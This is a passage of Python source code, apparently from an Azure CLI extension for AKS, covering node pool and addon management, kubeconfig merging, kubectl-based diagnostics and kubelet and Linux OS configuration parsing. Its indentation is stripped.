if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if scale_down_mode is not None:
instance.scale_down_mode = scale_down_mode
if mode is not None:
instance.mode = mode
if labels is not None:
instance.node_labels = labels
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_stop(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Stopped")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_start(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Running")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_addon_list_available():
available_addons = []
for k, v in ADDONS.items():
available_addons.append({
"name": k,
"description": ADDONS_DESCRIPTIONS[v]
})
return available_addons
def aks_addon_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
current_addons = []
for name, addon in ADDONS.items():
if not addon_profiles or addon not in addon_profiles:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": False
})
else:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": addon_profiles[addon].enabled
})
return current_addons
def aks_addon_show(cmd, client, resource_group_name, name, addon): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return {
"name": addon,
"api_key": addon_key,
"config": addon_profiles[addon_key].config,
"identity": addon_profiles[addon_key].identity
}
def aks_addon_enable(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
return enable_addons(cmd, client, resource_group_name, name, addon, workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_addon_disable(cmd, client, resource_group_name, name, addon, no_wait=False):
return aks_disable_addons(cmd, client, resource_group_name, name, addon, no_wait)
def aks_addon_update(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return enable_addons(cmd, client, resource_group_name, name, addon, check_enabled=False,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None, no_wait=False, enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
msi_auth = True if instance.service_principal_profile.client_id == "msi" else False # this is overwritten by _update_addons(), so the value needs to be recorded here
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if not msi_auth:
raise ArgumentUsageError("--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=True, create_dcr=True, create_dcra=True)
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profile.config = {logAnalyticsConstName: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
config_object.container_log_max_files = kubelet_config.get(
"containerLogMaxFiles", None)
config_object.container_log_max_size_mb = kubelet_config.get(
"containerLogMaxSizeMB", None)
config_object.pod_max_pids = kubelet_config.get(
"podMaxPids", None)
return config_object
def _get_linux_os_config(file_path):
if not os.path.isfile(file_path):
raise CLIError("{} is not valid file, or not accessable.".format(file_path))
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
